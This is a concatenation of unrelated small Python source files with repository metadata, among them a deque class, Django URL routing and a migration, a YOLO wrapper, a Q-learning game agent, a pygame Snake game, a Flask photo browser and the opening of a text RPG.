def __init__(self):
self.items=[]
def isEmpty(self):
return self.items == []
def size(self):
return len(self.items)
def addFront(self,item):
self.items.append(item)
def addRear(self,item):
self.items.insert(0,item)
def removeFront(self):
return self.items.pop()
def removeRear(self):
return self.items.pop(0)
d = Deque()
print(d.isEmpty())
d.addRear(4)
d.addRear('dog')
d.addFront('cat')
d.addFront(True)
print(d.size())
print(d.isEmpty())
d.addRear(8.4)
print(d.removeRear())
print(d.removeFront())
'''
回文词
'''
# from pythonds.basic.deque import Deque
# def palChecher(aString):
# charDeque = Deque()
# for ch in aString:
# charDeque.addFront(ch)
# print(charDeque.size())
#
# plalindrome = True
# while charDeque.size() > 1 and plalindrome:
# first = charDeque.removeFront()
# last = charDeque.removeRear()
# if first != last:
# plalindrome = False
# return plalindrome
#
# print(palChecher('121'))
# print(palChecher('1223'))
| [
"1015784643@qq.com"
] | 1015784643@qq.com |
a26e37a02f4f4268885227fc0f04aa6bf61e454b | 1c9c334d3de6217ca8a30c94e0f6fbb1104c8aa4 | /api_server/urls.py | e812944931b33ed95e8766e342762f61b9ebd5e3 | [] | no_license | rahulmishra24/notes-api-server | fbe556edb5d2dbf6c8b01929965081704a067280 | 75539486bbcff0b0f33374b57bcbabe48e343847 | refs/heads/master | 2023-02-24T11:29:05.872779 | 2021-01-27T18:02:10 | 2021-01-27T18:02:10 | 333,503,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | from django.urls import include, path
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'notes', views.NoteViewSet)
urlpatterns = [
path('', include(router.urls)),
]
| [
"mishrarahul215@gmail.com"
] | mishrarahul215@gmail.com |
86341d92d4860c2318af6b7c2be30b2b9d08ec06 | 156392eef4f888de81190e3d45e620fe55f55544 | /yolo.py | e0abc816425d2482579473e34ca04ea2106bcd7d | [] | no_license | khordoo/traffic-watch-object-detection | 6d29474360601721427ca42e1e1e885c2f6571f7 | 1040b8682f4ccecb0b88583b71bde56bbcc61184 | refs/heads/master | 2022-12-06T00:00:37.847641 | 2020-05-16T19:06:32 | 2020-05-16T19:06:32 | 207,481,530 | 8 | 2 | null | 2022-11-22T04:14:19 | 2019-09-10T06:27:47 | Python | UTF-8 | Python | false | false | 419 | py | from darkflow.net.build import TFNet
class YOLO:
"""
Python Wrapper for YOLO
"""
displayImageWindow = False
threshold = 0.12
options = {
'model': 'cfg/yolo.cfg',
'load': 'weights/yolov2.weights',
'threshold': threshold
}
def __init__(self):
self.tfnet = TFNet(self.options)
def detect(self, image):
return self.tfnet.return_predict(image)
| [
"m.khordoo@gmail.com"
] | m.khordoo@gmail.com |
8d22ca41c5fdd160170de7ddbeba78eb0decedcb | 06fd2c4908e64a40bfd34ec20a8e7d7a59e3aa01 | /roombooking/account/migrations/0006_delete_reservation.py | dc821fc0171a8482c5138c4713230441290aac2f | [
"MIT"
] | permissive | VirenKakasaniya/Roombooking-With-Django | d077fb039534325d816699ca3c7ac905f6c33b61 | 613e9bb9ee16ff2eb79782caca7480bdb095de57 | refs/heads/master | 2022-09-18T12:33:26.741868 | 2020-06-06T13:11:47 | 2020-06-06T13:11:47 | 269,979,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | # Generated by Django 3.0.3 on 2020-03-16 15:52
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0005_profile'),
]
operations = [
migrations.DeleteModel(
name='Reservation',
),
]
| [
"kakasaniyaviren1893@gmail.com"
] | kakasaniyaviren1893@gmail.com |
044aec0c5c23814bdfda79054ad101ae7c32827d | 326ecf9fd3b8ff5670dfd1faeb71504aac07452b | /Code/host-python/venv/Scripts/easy_install-3.7-script.py | 533d3be76b2f27a92232bdd4e87cc44d705a56bf | [] | no_license | y-cj123/beidou | 6dc4fbec8e23124fc16f31337e9b3d4a94c74e4f | 4b3a80cb8da4fb3464520024316b7399eb0bf457 | refs/heads/master | 2020-07-31T07:14:02.263772 | 2019-10-24T05:56:16 | 2019-10-24T05:56:16 | 210,526,165 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!D:\Users\JN\PycharmProjects\WpfApp\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"1975817668@qq.com"
] | 1975817668@qq.com |
65f9cfdb3e2d22893d9a562025b9bd322fc2b5d5 | ca8fe12def17494b4fd8a97664d7d9fcb1f9121f | /notifier.py | 5541ce560a39a17898c3957aad22a6fb585f744f | [] | no_license | pondelion/PassiveHealthMonitor | 0d52c71bc8b8aa327680ef7585bd24a608bd4385 | 4072c4c161a0d4d1c7e86931edb70b4c076e96e4 | refs/heads/main | 2023-04-25T16:06:12.784931 | 2021-05-15T03:49:35 | 2021-05-15T03:49:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | from abc import ABCMeta, abstractmethod
from overrides import overrides
class Notifier(metaclass=ABCMeta):
@abstractmethod
def notify(
self,
monitoring_target: str,
notified_cpunt: int
) -> None:
raise NotImplementedError
class MockNotifier(Notifier):
@overrides
def notify(
self,
monitoring_target: str,
notified_cpunt: int
) -> None:
print(f'{monitoring_target} : {notified_cpunt}')
DefaultNotifier = MockNotifier
| [
"programming.deve@gmail.com"
] | programming.deve@gmail.com |
6d1d33b8e617fe23309aeba8ce6c41eca9dd1792 | 9f56ddc837f3559fc0b47216477084a1a040cb98 | /shortageConf/apps.py | c94e4ac535c15b926f426a85f35eb5351aabb447 | [] | no_license | davidgit888/opdashboard | 2dc498731324657da8c0fc2c0dec11f548ae0d24 | 5f67628860ad655c787bafa810ca7fbd649952a8 | refs/heads/master | 2022-12-06T13:28:44.169926 | 2020-02-17T06:07:24 | 2020-02-17T06:07:24 | 163,798,432 | 0 | 0 | null | 2022-12-04T14:55:23 | 2019-01-02T05:38:15 | HTML | UTF-8 | Python | false | false | 133 | py | from django.apps import AppConfig
class ShortageconfConfig(AppConfig):
name = 'shortageConf'
verbose_name = '缺件配置'
| [
"rui.han@hexagon.com"
] | rui.han@hexagon.com |
95777f69b147a12e645c3e223346ef92efc6ea31 | 2afa477a46b3e20f890113107d421201474ecc77 | /game/intelligent_agent.py | 2643ec308963b9f09d6f8af0708582a839adf88e | [] | no_license | evangineer/Secure-Self-Attachment-Therapy | d7bb8b7e25f652ccf832b15cc6c969e6905e9853 | aa49cafa943669df6dad183b1e051e67df8b6394 | refs/heads/master | 2021-01-17T22:40:54.258810 | 2013-08-21T17:30:17 | 2013-08-21T17:30:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,771 | py | # This script contains the Intelligent Agent used in the game to guide the user.
# It is based of David Cittern's intelligent agent. It uses the GameLogic class and uses
# MDP, Q-learning algoritm and Ordinal Matrices to imitate the player.
# Q-learning equation: Q(s,a)' <- Q(s,a) + l*[R(s,s') + d*max[Q(s',a')] - Q(s,a)]
# where l: learning rate
# d: discount factor
# Ordinal Matrix: from avoidant: 2 | 3 to secure: 4 | 3
# ----- -----
# 1 | 4 1 | 2
# MDP: t | u where t: attend & go
# ----- u: ignore & go
# v | w v: attend & dont'go
# w: ignore & don't go
# AI Flow Chart:
#
# -------> Action ----------- Ordinal matrix -------------\
# | No | State Change?
# \--------------- Probability --------------/|
# | | Yes
# \--------- Q-Values ---------/
#
import renpy.store as store
import renpy.exports as renpy
from game_logic import GameLogic
import random
class IntelligentAgent(store.object):
# initialize all the member variables
def __init__(self):
# AI contains the Game Logic
self.ai_logic = GameLogic()
# discount factor in the Q-learning algorithm
self.discount = 0.4
# k value for exploration
self.k = 2
self.adult_last_move = "first"
self.change = 0
self.t_count = 0
self.u_count = 0
self.v_count = 0
self.w_count = 0
# setup and initialize ordinal matrix
self.ord_matrix = []
self.ord_t = 0
self.ord_u = 0
self.ord_v = 0
self.ord_w = 0
self.update_ord_matrix()
self.save_ord_matrix()
# setup and initialize Q-value matrix
self.q_t = self.ai_logic.t[1]
self.q_u = self.ai_logic.u[1]
self.q_v = self.ai_logic.v[1]
self.q_w = self.ai_logic.w[1]
self.q_matrix = []
self.update_q_matrix()
# setup and initialize probability matrix
self.probability_matrix = []
self.update_probability_matrix()
def reset_learning_rate(self):
self.t_count = 0
self.u_count = 0
self.v_count = 0
self.w_count = 0
# function to calculate new ordinal matrix with new state and store the ordinal matrix
def update_ord_matrix(self):
self.ai_logic.update_matrix()
self.ord_matrix = []
temp_matrix = [self.ai_logic.t[1], self.ai_logic.u[1], self.ai_logic.v[1], self.ai_logic.w[1]]
# for each action, rank the reward in terms of value. Giving a matrix representing 41 states
for i in range(4):
count = 1
for j in range(4):
if i == j:
continue
if temp_matrix[i] > temp_matrix[j]:
count += 1
self.ord_matrix.append(count)
# store ordinal values in the class to remember
def save_ord_matrix(self):
self.ord_t = self.ord_matrix[0]
self.ord_u = self.ord_matrix[1]
self.ord_v = self.ord_matrix[2]
self.ord_w = self.ord_matrix[3]
# checks if the new calculated ordinal matrix is different to the old one, representing a change in state
def ord_matrix_change(self):
if (self.ord_t != self.ord_matrix[0] or self.ord_u != self.ord_matrix[1] or self.ord_v != self.ord_matrix[2] or self.ord_w != self.ord_matrix[3]):
self.save_ord_matrix()
return True
return False
# updates the q matrix with new values of Q for each state change
def update_q_matrix(self):
self.q_matrix = []
self.q_matrix.append(self.q_t)
self.q_matrix.append(self.q_u)
self.q_matrix.append(self.q_v)
self.q_matrix.append(self.q_w)
# updates the Q value for action t.
def update_q_t(self):
if self.t_count == 0:
learning_rate = 1
else:
learning_rate = 1.0/self.t_count
self.q_t = self.q_t + learning_rate*(self.ai_logic.t[1] + (self.discount * max(self.q_matrix)) - self.q_t)
# updates the Q value for action u
def update_q_u(self):
if self.u_count == 0:
learning_rate = 1
else:
learning_rate = 1.0/self.u_count
self.q_u = self.q_u + learning_rate*(self.ai_logic.u[1] + (self.discount * max(self.q_matrix)) - self.q_u)
# updates the Q value for action v
def update_q_v(self):
if self.v_count == 0:
learning_rate = 1
else:
learning_rate = 1.0/self.v_count
self.q_v = self.q_v + learning_rate*(self.ai_logic.v[1] + (self.discount * max(self.q_matrix)) - self.q_v)
# updates the Q value for action w
def update_q_w(self):
if self.w_count == 0:
learning_rate = 1
else:
learning_rate = 1.0/self.w_count
self.q_w = self.q_w + learning_rate*(self.ai_logic.w[1] + (self.discount * max(self.q_matrix)) - self.q_w)
# updates the probability matrix after a change in Q values
def update_probability_matrix(self):
self.probability_matrix = []
self.update_q_matrix()
total = 0
for i in range(4):
total += self.k ** self.q_matrix[i]
self.probability_matrix.append((self.k**self.q_t)/total)
self.probability_matrix.append((self.k**self.q_u)/total)
self.probability_matrix.append((self.k**self.q_v)/total)
self.probability_matrix.append((self.k**self.q_w)/total)
# function called to inform the AI to make a move and returns the action in the form of [adult, child]
def move(self):
# random number from 0 to 1
choice = random.random()
# determine the probablistic range of each action
prob_t = self.probability_matrix[0]
prob_u = self.probability_matrix[0]+self.probability_matrix[1]
prob_v = self.probability_matrix[0]+self.probability_matrix[1]+self.probability_matrix[2]
prob_w = 1
# if t is chosen, adult attends
if choice < prob_t:
adult = "attend"
# if u is chosen, adult ignores
if prob_t <= choice and choice < prob_u:
adult = "ignore"
# if v is chosen, adult attends
if prob_u <= choice and choice < prob_v:
adult = "attend"
# if w is chosen, adult ignores
if prob_v <= choice and choice < prob_w:
adult = "ignore"
# find the action choice of the inner child given an adult's action choice
child = self.child_move(adult)
# find which action was chosen and update the specific Q value and probability matrix
if adult == "attend" and child == "go":
self.ai_logic.attend_go()
self.ai_logic.update_matrix()
self.update_ord_matrix()
# checks if the action caused a change in the ordinal matrix
if self.ord_matrix_change():
self.change += 1
self.reset_learning_rate()
self.t_count += 1
self.update_q_t()
self.update_q_matrix()
self.update_probability_matrix()
if adult == "attend" and child == "dontgo":
self.ai_logic.attend_dontgo()
self.ai_logic.update_matrix()
self.update_ord_matrix()
if self.ord_matrix_change():
self.change += 1
self.reset_learning_rate()
self.v_count += 1
self.update_q_v()
self.update_q_matrix()
self.update_probability_matrix()
if adult == "ignore" and child == "go":
self.ai_logic.ignore_go()
self.ai_logic.update_matrix()
self.update_ord_matrix()
if self.ord_matrix_change():
self.change += 1
self.reset_learning_rate()
self.u_count += 1
self.update_q_u()
self.update_q_matrix()
self.update_probability_matrix()
if adult == "ignore" and child == "dontgo":
self.ai_logic.ignore_dontgo()
self.ai_logic.update_matrix()
self.update_ord_matrix()
if self.ord_matrix_change():
self.change += 1
self.reset_learning_rate()
self.w_count += 1
self.update_q_w()
self.update_q_matrix()
self.update_probability_matrix()
return [adult, child]
# this function prompts the child to choose an action given the adult's choice.
# It picks the action with the greatest reward, if equal, then a random choice between go and don't go
def child_move(self, adult):
if self.adult_last_move == "first":
self.adult_last_move = adult
child_action = random.random()
if child_action <= 0.5:
return "go"
else:
return "dontgo"
if self.adult_last_move == "attend":
self.adult_last_move = adult
if self.ai_logic.t[0] > self.ai_logic.v[0]:
return "go"
elif self.ai_logic.t[0] < self.ai_logic.v[0]:
return "dontgo"
elif self.ai_logic.t[0] == self.ai_logic.v[0]:
child_action = random.random()
if child_action < 0.5:
return "go"
else:
return "dontgo"
if self.adult_last_move == "ignore":
self.adult_last_move = adult
if self.ai_logic.u[0] > self.ai_logic.w[0]:
return "go"
elif self.ai_logic.u[0] < self.ai_logic.w[0]:
return "dontgo"
elif self.ai_logic.u[0] == self.ai_logic.w[0]:
child_action = random.random()
if child_action < 0.5:
return "go"
else:
return "dontgo"
# checks if the AI won the game given an action pair
def check_win(self, adult, child):
return self.ai_logic.check_win(adult, child)
# returns the number of rounds the AI has played
def get_round(self):
return self.ai_logic.round | [
"zero.caleb@gmail.com"
] | zero.caleb@gmail.com |
6c5a5c0f95d2a5a614ffe10e688fb03a6e36acf4 | d1fca4af511d0cfad53100e860c10a10345e95cd | /EntregasProyecto/SuanaCordovaYPaolaMartinez/PilarVazquez.py | b5de73a107a287fcc9b7f3be0f9c36746e7f3159 | [] | no_license | pcruiher08/SnakeGame | d27c4ffbb1fd9e38b6f0e60658dad93857077777 | 69a78e1503c7448c3d2c8a721f91b1926c2e2db8 | refs/heads/master | 2022-12-02T10:49:13.113066 | 2020-08-07T23:23:12 | 2020-08-07T23:23:12 | 277,183,237 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,538 | py | # Libraries
import pygame, random
# Colors
black=(0,0,0)
background=(231,197,130)
green=(77,228,145)
red=(255,38,78)
# Variables
running=True
pause=False
screenSize=500
pixelSize=10
speed=10
direction="RIGHT"
game_over=False
pause=False
headX=50
headY=50
screen=pygame.display.set_mode((screenSize,screenSize))
snake=[(headX,headY)]
# Coordinates
randomX=random.randrange(50,450,10)
randomY=random.randrange(50,450,10)
snack=[(randomX,randomY)]
# Fuctions
def initialization():
pygame.init()
pygame.display.set_caption("Snake Game")
def checkEvents(events):
global running
for event in events:
if event.type==pygame.QUIT:
running=False
def drawSnake(screen,snake):
global pixelSize
for pixel in snake:
pygame.draw.rect(screen,(green),(pixel[0],pixel[1],pixelSize,pixelSize))
def moveSnake(direction,snake):
global speed
newHeadX=snake[0][0]
newHeadY=snake[0][1]
snake.pop()
if direction=="UP":
newHeadY-=speed
elif direction=="DOWN":
newHeadY+=speed
elif direction=="RIGHT":
newHeadX+=speed
elif direction=="LEFT":
newHeadX-=speed
snake.insert(0,(newHeadX,newHeadY))
def drawSnack(screen,snack):
global pixelSize
pygame.draw.rect(screen,(red),(snack[0][0],snack[0][1],pixelSize,pixelSize))
def Snake_Snack(snake,snack,screen):
def addPixel(snake):
newX=snake[0][0]
newY=snake[0][1]
snake.insert(0,(newX,newY))
def redrawSnack(screen,snack):
randomX=random.randrange(50,450,10)
randomY=random.randrange(50,450,10)
global pixelSize
pygame.display.flip()
snack.pop()
snack.insert(0,(randomX,randomY))
if snake[0]==snack[0]:
addPixel(snake)
redrawSnack(screen,snack)
def Snake_Snake(snake):
global game_over
for i in range(2,len(snake)):
if snake[0]==snake[i]:
game_over=True
def Snake_Screen(snake):
global screenSize
global game_over
if (snake[0][0]>screenSize-10 or snake[0][0]<0):
game_over=True
elif (snake[0][1]>screenSize-10 or snake[0][1]<0):
game_over=True
def k_direction(keys,headX,headY):
global direction
global speed
if keys[pygame.K_RIGHT] and direction!="LEFT":
direction="RIGHT"
headX+=speed
elif keys[pygame.K_LEFT] and direction!="RIGHT":
direction="LEFT"
headX-=speed
elif keys[pygame.K_UP] and direction !="DOWN":
direction="UP"
headY-=speed
elif keys[pygame.K_DOWN] and direction !="UP":
direction="DOWN"
headY+=speed
return headX,headY, direction
def drawGame_Over(game_over):
global screenSize
global running
def drawRestart(screen):
font=pygame.font.SysFont("serif",30)
text= font.render("Play again: R",True,black)
X=(250)-(text.get_width()//2)
Y=(350)-(text.get_height()//2)
screen.blit(text,((X,Y)))
def drawScore(screen):
score=(len(snake)*10)-10
font=pygame.font.SysFont("serif",30)
text= font.render((f"Your score: {score}"),True,black)
X=(250)-(text.get_width()//2)
Y=(150)-(text.get_height()//2)
screen.blit(text,((X,Y)))
if game_over:
screenG_O=pygame.display.set_mode((screenSize,screenSize))
for event in pygame.event.get():
if event.type==pygame.QUIT:
running=False
screenG_O.fill(background)
font=pygame.font.SysFont("serif",50)
text= font.render("GAME OVER",True,black)
centerX=(screenSize//2)-(text.get_width()//2)
centerY=(screenSize//2)-(text.get_height()//2)
screenG_O.blit(text,[centerX,centerY])
drawRestart(screenG_O)
drawScore(screenG_O)
pygame.display.flip()
def drawScore(screen):
score=(len(snake)*10)-10
font=pygame.font.SysFont("serif",20)
text= font.render((f"Your score: {score}"),True,black)
X=(400)-(text.get_width()//2)
Y=(20)-(text.get_height()//2)
screen.blit(text,((X,Y)))
def paused(keys):
global running
global pause
if keys[pygame.K_p]:
pause=True
running=False
while pause:
font=pygame.font.SysFont("serif",50)
text= font.render("PAUSE",True,black)
centerX=(250)-(text.get_width()//2)
centerY=(250)-(text.get_height()//2)
screen.blit(text,(centerX,centerY))
pygame.display.flip()
pygame.event.wait()
keys=pygame.key.get_pressed()
if keys[pygame.K_p]:
pause=False
running=True
main()
def restart(keys):
global running
global pause
global game_over
global direction
global headX
global headY
global snake
global randomX
global randomY
global snack
if keys[pygame.K_r]:
if not running:
running=True
if pause:
pause=False
if game_over:
game_over=False
direction="RIGHT"
headX=50
headY=50
snake=[(headX,headY)]
randomX=random.randrange(50,450,10)
randomY=random.randrange(50,450,10)
snack=[(randomX,randomY)]
main()
# Principal fuction
def main():
# Global variables
global running
global pause
global screenSize
global game_over
global headX
global headY
global direction
# Initialization
initialization()
screen=pygame.display.set_mode((screenSize,screenSize))
while running:
clock=pygame.time.Clock()
# Events
events=pygame.event.get()
checkEvents(events)
# Color de fondo
screen.fill(background)
# Keys
keys=pygame.key.get_pressed()
k_direction(keys,headX,headY)
# Fuctions
drawScore(screen)
moveSnake(direction,snake)
drawSnake(screen,snake)
drawSnack(screen,snack)
# Collisions
# Snake-Snack
Snake_Snack(snake,snack,screen)
# Snake-Snake
Snake_Snake(snake)
# Snake-Screen
Snake_Screen(snake)
# Game_Over
drawGame_Over(game_over)
# Paused
paused(keys)
# Restart
restart(keys)
# Actualizar pantalla
pygame.display.flip()
clock.tick(10)
pygame.quit
main()
# python .\Snake.py | [
"pcruiher089@gmail.com"
] | pcruiher089@gmail.com |
26b5869a3a73a98502d47e4cb090fc004ff119f9 | c651e102de29f75a66daf5411bc3f3ddb49525ce | /day2_Homework/day2HW1.py | 23e4234ce046d6430c1141a30d3a3cdcd18cd315 | [] | no_license | ArtKorman/cmdb-bootcamp-homework | b926acf320cb97810d229fbee2ba6d29592bc76d | 3c795050d2651eb9aed2664b1d4ef5c65fe375f6 | refs/heads/master | 2021-01-09T22:46:17.082937 | 2014-09-08T02:48:44 | 2014-09-08T02:48:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | #! /usr/bin/env python
import pandas as pd
import matplotlib.pyplot as plt
cufflinks_output = "/Users/cmdb/data/results/SRR072893_clout/genes.fpkm_tracking"
cufflinks_output2 = "/Users/cmdb/data/results/SRR072915_clout/genes.fpkm_tracking"
df = pd.read_table( cufflinks_output )
df2 = pd.read_table( cufflinks_output2 )
#Male Data
top = df.sort("FPKM", ascending=False)["FPKM"] [0:5200]
middle = df.sort("FPKM", ascending=False) ["FPKM"] [5200:10400]
bottom = df.sort("FPKM", ascending=False) ["FPKM"] [10400:]
data_set = [top, middle, bottom]
fig = plt.figure
plt.boxplot(data_set)
plt.savefig("Box_Male")
#Female Data
top2 = df2.sort("FPKM", ascending=False)["FPKM"] [0:5200]
middle2 = df2.sort("FPKM", ascending=False) ["FPKM"] [5200:10400]
bottom2 = df2.sort("FPKM", ascending=False) ["FPKM"] [10400:]
data_set2 = [top2, middle2, bottom2]
fig = plt.figure
plt.boxplot(data_set2)
plt.savefig("Box_Female") | [
"IArthurKormanI@gmail.com"
] | IArthurKormanI@gmail.com |
d9f6a916bca93eb5d16e2396026df0aa948f93f2 | 9b3863c6c1a7ee609e10e9a3f147724ebbcba541 | /graph_search/component_manager_test.py | 562678f0c9a9b3a5f3c41ce72da4d77bfe5afa7c | [] | no_license | naveenprao/algorithm | ad1745267f1def681889390ab64ecf7f7a899bcf | c95019ed279dd98e2d18c3d868263bb8242db0e9 | refs/heads/master | 2021-05-04T08:46:26.561369 | 2017-03-21T19:53:16 | 2017-03-21T19:53:16 | 70,366,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | import unittest
from component_manager import ComponentManager
class TestAdd(unittest.TestCase):
def test_add_two_component(self):
cm = ComponentManager()
cm.add_component('pgm1')
cm.add_component('pgm2')
self.assertTrue(len(cm.dep_graph) == 2)
class TestMakeDependent(unittest.TestCase):
def test_make_dependent(self):
cm = ComponentManager()
cm.add_component('pgm1')
cm.add_component('pgm2')
cm.make_dependent('pgm1', 'pgm2')
print 'depends graph', cm.dep_graph
print 'used by graph', cm.usedby_graph
self.assertTrue(len(cm.dep_graph['pgm2']) == 0)
self.assertTrue(len(cm.usedby_graph['pgm1']) == 0)
self.assertTrue('pgm1' in cm.usedby_graph['pgm2'])
self.assertTrue('pgm2' in cm.dep_graph['pgm1'])
class TestRemove(unittest.TestCase):
def test_remove(self):
cm = ComponentManager()
cm.add_component('A')
cm.add_component('B')
cm.add_component('C')
cm.add_component('D')
cm.make_dependent('A', 'B')
cm.make_dependent('B', 'C')
cm.make_dependent('D', 'C')
#cm.print_graph()
cm.remove('A')
cm.print_graph()
def test_remove_cycle(self):
cm = ComponentManager()
cm.add_component('A')
cm.add_component('B')
cm.add_component('C')
cm.add_component('D')
cm.add_component('E')
cm.make_dependent('A', 'B')
cm.make_dependent('B', 'C')
cm.make_dependent('C', 'D')
cm.make_dependent('D', 'B')
cm.make_dependent('E', 'D')
cm.remove('A')
cm.print_graph()
if __name__ == '__main__':
unittest.main()
| [
"nrao@salesforce.com"
] | nrao@salesforce.com |
997b8530fba349b6c10f6d4738fbf52fe30b43e3 | 75769a749295320029d3a3b500a4b5a917638e4d | /qzone/login/testMain.py | 13d06ea5e8c87c01993f6072cb3e522c892f8811 | [] | no_license | haiboz/qzoneSpider | ed21b09a581eebbaf830b3e438806116523f1280 | bcd25f6fc6fe8583128e8c51a0112e1f288eee6c | refs/heads/master | 2021-01-20T15:59:30.735837 | 2016-07-15T16:33:30 | 2016-07-15T16:33:30 | 62,299,991 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,968 | py | #coding:utf8
'''
Created on 2016-6-24
@author: 浮生若梦
'''
import sqlConnect
from qzone.spiderUtils import qqParser
from qzone.login import login
import qZoneMain
import time
#
class TestMain(object):
def __init__(self):
self.parser = qqParser.QQParser()
self.qZoneMain = qZoneMain.QQMain()
self.sqlConnect = sqlConnect.SQLConnect()
self.login = login.QZoneLogin()
self.qq = "1069757861"
def testIns(self):
qq = self.qq
self.parser.parseMood(qq)
connect = sqlConnect.SQLConnect()
# conn = connect.connect()
# cursor = conn.cursor()
content = "content"
date = "2016-01-02"
scount = "2"
pcount = "3"
zcount = "5"
sql = "insert into mood(mood_id,date,mood_content,support_count,comment_count,forward_count) values('"+qq+"','"+date+"','"+content+"',"+scount+","+pcount+","+zcount+")"
# connect.insert(sql)
def testParseQQFrind(self):
print "testParseQQFrind"
self.parser.parseQQFriend(self.qq)
def testInsertQQ(self, qq):
self.qZoneMain.insertDealtQQ(qq)
pass
def testInsertSpicelSignl(self):
'''测试sql插入特殊字符'''
content = "it's 自动释放 or never"
# content = content.replace("'", "\\'")
sql = "insert test(content) values ('"+content+"')"
self.sqlConnect.insert(sql)
print "success"
pass
def testGetLoginQQ(self):
count = 1
while count < 10:
qq,pwd = self.login.getInitInfo(count)
print qq
print pwd
count = count + 1
pass
def testQQLogin(self):
browser = self.login.loginQQ(2)
return browser
if __name__ == "__main__":
testMain = TestMain()
currentQQ = 1145426412
#
# testMain.testIns()
# testMain.testParseQQFrind()
# testMain.testInsertQQ("798102408")
# testMain.testInsertSpicelSignl()
# testMain.testGetLoginQQ()
# browser = testMain.testQQLogin()
# # currentQQ = 1145426412
# currentQQ = 2425705688
# testMain.qZoneMain.crawUserInfo(browser, currentQQ)
# browser.quit()
# testMain.parser.parseUserInfo(currentQQ)
ISOTIMEFORMAT="%Y-%m-%d %X"
tt = time.strftime( ISOTIMEFORMAT, time.localtime() )
print "shijian:"+tt
| [
"798102408@qq.com"
] | 798102408@qq.com |
eb84f4f3aa5f7e87dd2f03dcbcfa66d736fc84e6 | 17870e3a15504a7054ef59a532322baa39edba19 | /web/web.py | 09db76fc591b49e0e0e84c1ca5d81e194e99e396 | [] | no_license | lorabit/yuerec | d1e2f86d1d7e1b869d3db93f3967db0150c02f85 | dfe036ff1e5180189d467723dbf4387b092ed5cc | refs/heads/master | 2021-01-01T16:05:42.754210 | 2017-10-25T02:52:15 | 2017-10-25T02:52:15 | 24,885,108 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,686 | py | # all the imports
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, \
abort, render_template, flash, json, send_file
import settings
import time
import Image
import os
app = Flask(__name__)
app.config.from_object(settings)
def connect_db():
return sqlite3.connect(app.config['DATABASE'])
@app.route("/")
def index():
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where deleted=? order by resouces.id desc limit 20',(session["deleted"],)).fetchall()
return render_template('index.html',pList = pList)
@app.route("/loadMore/<id>")
def loadMore(id):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where resouces.id<? and deleted=? order by resouces.id desc limit 20',(id,session["deleted"]))
return json.dumps(pList.fetchall())
@app.route("/photo/<pid>")
def loadPhoto(pid):
if os.path.exists('../images/w300'+pid)==False:
im = Image.open('../images/'+pid)
oW = im.size[0]
oH = im.size[1]
cim = im.resize((300,oH*300/oW))
cim.save('../images/w300'+pid)
return send_file('../images/w300'+pid, mimetype='image/jpg')
@app.route("/search/<keyword>")
def search(keyword):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where location like ? and deleted=? order by resouces.id desc limit 20',('%'+keyword+'%',session["deleted"])).fetchall()
return render_template('search.html',pList = pList,keyword = keyword)
@app.route("/search/<keyword>/loadMore/<id>")
def searchLoadMore(keyword,id):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where resouces.id<? and location like ? and deleted=? order by resouces.id desc limit 20',(id,'%'+keyword+'%',session["deleted"])).fetchall()
return json.dumps(pList)
@app.route("/photo/<pid>/delete")
def deletePhoto(pid):
g.db.execute('update resouces set deleted = 2 where pid=?',(pid,));
g.db.commit()
return json.dumps({"msg":"success"})
@app.route("/adv/<deleted>")
def adv(deleted):
session["deleted"] = int(deleted);
return redirect('/')
@app.before_request
def before_request():
g.db = connect_db()
if session.has_key("deleted")==False:
session["deleted"] = 0
@app.teardown_request
def teardown_request(exception):
db = getattr(g, 'db', None)
if db is not None:
db.close()
if __name__ == "__main__":
app.run(host = app.config['HOST'],port = app.config['PORT'])
| [
"yanan.xyn@alibaba-inc.com"
] | yanan.xyn@alibaba-inc.com |
7240fc84a515b8a73bc21daa1816e17899460734 | 8a6031c0cfa18c4b4d371f0b0bb434f01f62c48c | /RPGGamePython.py | 8de45480e50b919aafbe76e070a3467c03364949 | [] | no_license | jtroina8/python_game | ce4252d312639d3ed9a92c1bae4e112c8ddd07c5 | 914717b147fbb004d33bdb8def98582676961651 | refs/heads/main | 2023-03-25T07:33:42.258238 | 2021-03-20T19:05:16 | 2021-03-20T19:05:16 | 349,578,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,316 | py | import random
def story():
print('''
_,.
,` -.)
( _/-\\-._
/,|`--._,-^| ,
\_| |`-._/|| ,'|
| `-, / | / /
| || | / /
`r-._||/ __ / / Greetings, Holy Knight!
__,-<_ )`-/ `./ / Welcome to the Kingdom of Pythoon!
' \ `---' \ / / A kingdom that's perfect for beginners.
| |./ /
/ // / Beware! The Demon Knight is invading!
\_/' \ |/ / Please take your holy sword, Excalibur,
| | _,^-'/ / and eliminate this threat!
| , `` (\/ /_
\,.->._ \X-=/^ ~Best of luck~
( / `-._//^`
`Y-.____(__}
| {__)
()
''')
play_again = True
# Set up the play again loop
while play_again:
winner = None
player_health = 1000
